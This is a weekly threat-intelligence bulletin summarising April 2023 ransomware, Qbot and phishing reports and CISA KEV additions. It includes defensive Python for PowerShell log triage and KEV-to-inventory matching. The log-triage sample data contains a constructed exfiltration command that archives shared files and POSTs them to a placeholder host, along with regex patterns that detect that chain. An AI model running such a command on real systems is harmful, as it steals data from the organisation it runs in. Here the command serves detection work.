Ransomware
New CrossLock Ransomware Discovered
Impacted Industries: All
What You Need To Know:
On 18 April 2023, Cyble reported that they discovered a new ransomware called CrossLock, which uses data-cleaning tactics to hamper recovery efforts. Once loaded, CrossLock performs multiple cleaning tactics on the target’s machine to avoid recovery. There is no information regarding the total number of victims, the industries they operate in, or if the cybercriminals are operating now. Out of an abundance of caution, we’re assuming that all customers fit the adversary’s interest which makes the likelihood of compromise consistent with normal expectations. The impact of this threat will cause significant damage leading to financial loss, proprietary data theft, and disruption in operations due to the deployment of ransomware.
Ransomware
Analysis of “Read the Manual” RaaS
Impacted Industries: All
What You Need To Know:
On 13 April 2023, Trellix reported that they discovered the e-crime group “Read the Manual” is now offering Ransomware-as-a-Service, and forces affiliates to follow a strict ruleset. Their locker uses multi-threading to encrypt logical volumes attached to a machine and can only properly work with administrative privileges. There is no information regarding the total number of victims, the industries they operate in, or if the cybercriminals are operating now. Out of an abundance of caution, we’re assuming that all customers fit the adversary’s interest which makes the likelihood of compromise consistent with normal expectations. The impact of this threat will cause significant damage leading to financial loss, proprietary data theft, and disruption in operations due to the deployment of ransomware.
Ransomware
Vice Society Using Living Off The Land Tactics
Impacted Industries: All
What You Need To Know:
On 13 April 2023, Palo Alto reported that they discovered that the Vice Society ransomware gang used an automated PowerShell script to exfiltrate data. Threat actors often use living off the land techniques to evade detection within Windows environments. There is no information regarding the total number of victims, the industries they operate in, or if the cybercriminals are operating now. Out of an abundance of caution, we’re assuming that all customers fit the adversary’s interest which makes the likelihood of compromise consistent with normal expectations. The impact of this threat will cause significant damage leading to financial loss, proprietary data theft, and disruption in operations due to the deployment of ransomware.
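The bulletin does not describe the script itself, so the following is a generic defender-side illustration, added here and not from Palo Alto or the original report: it triages PowerShell Script Block Logging records (Event ID 4104 style) and flags script blocks that combine recursive file discovery, archive staging, and an HTTP upload, which is the living-off-the-land pattern such exfiltration tends to leave in logs. The event records, hostnames, user names, and URLs are constructed sample data, and the signal patterns are assumptions a detection engineer would tune to their own environment.

```python
"""Triage PowerShell script block log records for a discovery + upload pattern.

Added example, not code from the bulletin or from Palo Alto. Every record,
host, user and URL below is constructed; the SIGNALS patterns are a starting
heuristic, not a signature for any specific group's script.
"""
import re

# Constructed Event ID 4104 (Script Block Logging) records, already parsed
# into dicts as a SIEM or log pipeline would present them.
SAMPLE_EVENTS = [
    {"record_id": 1001, "host": "WS-ADMIN-02", "user": "CORP\\itops",
     # Routine admin task: non-recursive listing exported to a CSV.
     "script_block": "Get-ChildItem C:\\Logs\\*.log | Export-Csv C:\\Reports\\logs.csv"},
    {"record_id": 1002, "host": "FS-01", "user": "CORP\\svc-backup",
     # Discovery over shares, archive staging, then an HTTP POST of the archive.
     "script_block": ("$files = Get-ChildItem -Path \\\\fs-01\\shares -Recurse -Include *.docx,*.xlsx,*.pdf; "
                      "Compress-Archive -Path $files.FullName -DestinationPath C:\\Windows\\Temp\\a.zip; "
                      "Invoke-WebRequest -Uri https://placeholder.example/u -Method Post -InFile C:\\Windows\\Temp\\a.zip")},
    {"record_id": 1003, "host": "WS-DEV-07", "user": "CORP\\dev1",
     # Ordinary GET to an internal API: network activity but no upload.
     "script_block": "Invoke-RestMethod -Uri https://intranet.example/api/build -Method Get"},
]

# Heuristic signals (assumed; tune to your environment). Each pattern is
# scoped to a single pipeline segment so flags on a later command do not
# attach to an earlier cmdlet.
SIGNALS = {
    "discovery": re.compile(r"\b(Get-ChildItem|gci)\b[^;|]*-Recurse", re.I),
    "staging": re.compile(r"\bCompress-Archive\b|\[IO\.Compression\.ZipFile\]", re.I),
    "upload": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b[^;|]*?(-Method\s+Post|-InFile)|\.UploadFile\(",
        re.I),
}


def score_event(event):
    """Return which signals fire for one record and a verdict.

    'suspect' requires discovery AND upload in the same script block; a lone
    signal is only 'info', since recursive listings and POSTs are common on
    their own.
    """
    block = event["script_block"]
    hits = [name for name, rx in SIGNALS.items() if rx.search(block)]
    if {"discovery", "upload"} <= set(hits):
        verdict = "suspect"
    elif hits:
        verdict = "info"
    else:
        verdict = "none"
    return {"record_id": event["record_id"], "host": event["host"],
            "user": event["user"], "signals": hits, "verdict": verdict}


def triage(events):
    """Return only the records that reach the 'suspect' verdict."""
    return [r for r in map(score_event, events) if r["verdict"] == "suspect"]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding['host']} record {finding['record_id']} ({finding['user']}): "
              f"{', '.join(finding['signals'])}")
```

In a real deployment the records would come from the Microsoft-Windows-PowerShell/Operational channel and the verdict would be one enrichment among several (account type, destination reputation, volume over time); requiring two signals in one block keeps the rule from paging on every backup job or inventory script.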
Malware
Qbot Operators Use Email Thread Hijacking
Impacted Industries: Financial Services, Education, and Healthcare Industries
What You Need To Know:
On 17 April 2023, Kaspersky reported that they detected Qbot malware delivered through hijacked business email threads carrying attached PDF files. The malware can extract passwords and cookies, steal messages, intercept traffic, and give operators remote access to the infected system. The cybercriminals can download additional malware, such as Cobalt Strike, to spread the infection throughout the victim’s network. The threat is reported as limited and is operating now, targeting various organizations based in the US. Customers in the financial services, banking, education, and healthcare industries fit the adversary’s interest, which makes the likelihood of compromise consistent with normal expectations; the impact would cause a considerable level of damage, including data breach and theft.
Phishing
RAT Delivered in Tax Day Phishing Campaign
Impacted Industries: Professional Services
What You Need To Know:
On 13 April 2023, Microsoft reported that they detected a phishing campaign themed around tax filing targeting financial services firms. The goal of the campaign is to deliver the Remcos remote access trojan. In some cases, they used GuLoader to execute shellcode which then downloaded Remcos on the target machine. The use of phishing emails themed around tax filing is reported as limited and unlikely to continue now that the tax deadline passed on 18 April. However, the cybercriminals are highly likely to switch phishing email themes to deliver the RAT. US-based organizations in the tax preparation, financial services, CPA and accounting, and professional services industries fit the adversary’s interest, which makes the likelihood of compromise consistent with normal expectations; the impact would cause a considerable level of damage, including threat actors gaining remote access to systems and networks.
Phishing
Latest Additions to Data Leak Sites
Impacted Industries: Manufacturing, Information, Other Services, Finance and Insurance, Technical Services
What You Need To Know:
In the past week, monitored ransomware threat groups added 115 victims to their leak sites. Of those listed, 64 are based in the US. The most popular industry listed was manufacturing with 32 victims. They were followed by ten in the information sector, eight each in other services and in finance and insurance, and seven in technical services. This information represents victims whom cybercriminals may have successfully attacked but who opted not to negotiate or pay a ransom. However, we cannot confirm the validity of the cybercriminals’ claims.
Exploited Vulnerabilities
CISA Adds 5 CVEs to its Known Exploited Vulnerabilities Catalog
Impacted Industries: All
What You Need To Know:
On 13, 17, and 19 April, CISA added five CVEs to its Known Exploited Vulnerabilities Catalog. The CVEs added this week are CVE-2023-29492, CVE-2023-20963, CVE-2023-2033, CVE-2019-8526, and CVE-2017-6742. The vulnerabilities affect products from Novi Survey, Android, Google, Apple, and Cisco. CVE-2017-6742 allows an authenticated remote attacker to execute code or cause a system reload on an affected device through a vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS and IOS XE software. ATI recommends that mitigation for each entry be completed by the mitigation “Due Date” CISA assigns to it.
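A practical way to act on a KEV update is to parse the catalog feed, match its vendor/product pairs against an asset inventory, and rank the hits by CISA’s “Due Date”. The following is an added example, not code from CISA or from the bulletin: the JSON excerpt reuses the five CVE IDs named above and the public KEV feed’s field names, but the per-entry dates, product strings, and required-action text are constructed placeholders (the bulletin does not say which CVE was added on which day), and the asset inventory is likewise constructed.

```python
"""Match a KEV feed excerpt against an asset inventory and rank by due date.

Added example, not CISA's code. Field names follow the public KEV JSON feed;
the dateAdded/dueDate/product values below are constructed placeholders, not
the real catalog entries for these CVEs.
"""
import json
from datetime import date

# Constructed excerpt shaped like the KEV feed. CVE IDs are those named in
# the bulletin; every other value is a placeholder.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities (constructed excerpt)",
    "vulnerabilities": [
        {"cveID": "CVE-2023-29492", "vendorProject": "Novi Survey", "product": "Novi Survey",
         "dateAdded": "2023-04-13", "dueDate": "2023-05-04",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2023-20963", "vendorProject": "Android", "product": "Framework",
         "dateAdded": "2023-04-13", "dueDate": "2023-05-04",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2023-2033", "vendorProject": "Google", "product": "Chromium V8",
         "dateAdded": "2023-04-17", "dueDate": "2023-05-08",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2019-8526", "vendorProject": "Apple", "product": "macOS",
         "dateAdded": "2023-04-17", "dueDate": "2023-05-08",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-2017-6742", "vendorProject": "Cisco", "product": "IOS and IOS XE",
         "dateAdded": "2023-04-19", "dueDate": "2023-05-10",
         "requiredAction": "Apply updates per vendor instructions."},
    ],
})

# Constructed asset inventory (hostnames are placeholders).
INVENTORY = [
    {"host": "edge-rtr-01", "vendorProject": "Cisco", "product": "IOS and IOS XE"},
    {"host": "survey-web-01", "vendorProject": "Novi Survey", "product": "Novi Survey"},
    {"host": "fileserver-01", "vendorProject": "Microsoft", "product": "Windows Server"},
]


def parse_kev(feed_text):
    """Return {cveID: entry} with the ISO date strings converted to date objects."""
    feed = json.loads(feed_text)
    entries = {}
    for item in feed["vulnerabilities"]:
        entry = dict(item)
        entry["dateAdded"] = date.fromisoformat(item["dateAdded"])
        entry["dueDate"] = date.fromisoformat(item["dueDate"])
        entries[item["cveID"]] = entry
    return entries


def _key(vendor, product):
    # Normalise for matching; real inventories need fuzzier mapping than this.
    return (vendor.strip().lower(), product.strip().lower())


def match_inventory(kev, inventory, today):
    """Return findings for assets whose vendor/product appears in the KEV set.

    `today` is an ISO date string; findings are sorted by CISA due date so the
    nearest (or already missed) deadlines come first.
    """
    as_of = date.fromisoformat(today)
    by_product = {}
    for entry in kev.values():
        by_product.setdefault(_key(entry["vendorProject"], entry["product"]), []).append(entry)
    findings = []
    for asset in inventory:
        for entry in by_product.get(_key(asset["vendorProject"], asset["product"]), []):
            days_left = (entry["dueDate"] - as_of).days
            findings.append({
                "host": asset["host"],
                "cveID": entry["cveID"],
                "dueDate": entry["dueDate"].isoformat(),
                "days_left": days_left,
                "overdue": days_left < 0,
                "requiredAction": entry["requiredAction"],
            })
    findings.sort(key=lambda f: (f["dueDate"], f["host"]))
    return findings


def newly_added(kev, since):
    """Return CVE IDs added on or after the ISO date `since`, sorted."""
    cutoff = date.fromisoformat(since)
    return sorted(cve for cve, entry in kev.items() if entry["dateAdded"] >= cutoff)


if __name__ == "__main__":
    catalog = parse_kev(KEV_SAMPLE)
    for finding in match_inventory(catalog, INVENTORY, "2023-05-06"):
        status = "OVERDUE" if finding["overdue"] else f"{finding['days_left']}d left"
        print(f"{finding['host']}: {finding['cveID']} due {finding['dueDate']} ({status})")
```

Against the live feed the same functions apply unchanged; the weak point in practice is the vendor/product join, since KEV product strings rarely match inventory naming exactly, so a production version would map KEV entries to CPEs or to an internal product taxonomy rather than comparing lower-cased strings.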
What We Mean When We Say
Estimates of Likelihood
We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not occur. Terms like “might” reflect situations where we are unable to assess the likelihood, usually because the relevant information is lacking, sketchy, or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.
Confidence in Assessments
Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:
- High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
- Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
- Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.